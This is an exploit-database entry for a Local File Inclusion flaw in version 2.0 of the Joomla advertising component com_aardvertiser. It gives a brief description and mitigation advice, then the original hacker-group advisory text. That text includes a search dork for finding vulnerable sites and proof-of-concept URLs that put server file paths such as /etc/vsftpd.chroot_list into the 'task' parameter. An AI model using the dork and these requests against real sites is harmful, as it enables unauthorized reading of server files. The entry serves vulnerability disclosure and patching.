Joomla Component advertising (com_aardvertiser) V2.0 Local File Inclusion Vulnerability

vendor:

aardvertiser

by:

eidelweiss

7,5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: aardvertiser

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: NO

Related CWE: N/A

CPE: a:aardvertiser:aardvertiser:2.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla Component advertising (com_aardvertiser) V2.0 Local File Inclusion Vulnerability

A Joomla 1.5 component for advertising items in a 'classified ads' style is vulnerable to a Local File Inclusion vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal characters (e.g. '../') to the vulnerable application. This will allow the attacker to read arbitrary files from the server.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations. Also, ensure that the web server is configured to deny access to sensitive files and directories.

Source

Exploit-DB raw data:

========================================================================
Joomla Component advertising (com_aardvertiser) V2.0 Local File Inclusion Vulnerability
========================================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ########################################          1
0                    I'm eidelweiss member from Inj3ct0r Team          1
1                    ########################################          0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Download:	http://sourceforge.net/projects/aardvertiser/files/

Author:		eidelweiss
Contact:		eidelweiss[at]cyberservices.com
Thank`s:		r0073r & 0x1D (inj3ct0r) , JosS , exploit-db team , [D]eal [C]yber
Greetz: 		all inj3ctor Team, yogyacarderlink Team, devilzc0de & all INDONESIAN HACKER`s

========================================================================

-=[Descripttion]=-

A Joomla 1.5 component for advertising items in a 'classified ads' style on a Joomla site complete with extra modules and plugins for improved functionality. 


	-=[Dork]=-

	inurl:/index.php?option=com_aardvertiser

	-=[Exploit]=-

	http://localhost/index.php?option=com_aardvertiser&cat_name=conf&task= [lfi]
	http://localhost/index.php?option=com_aardvertiser&task= [lfi]

	-=[LFI]=-

	/etc/vsftpd.chroot_list
	/usr/local/etc/apache/vhosts.conf

	-=[ P0C ]=-

	http://localhost/index.php?option=com_aardvertiser&cat_name=conf&task=/usr/local/etc/apache/vhosts.conf
	http://localhost/index.php?option=com_aardvertiser&task=/etc/vsftpd.chroot_list

=========================| -=[ E0F ]=- |=================================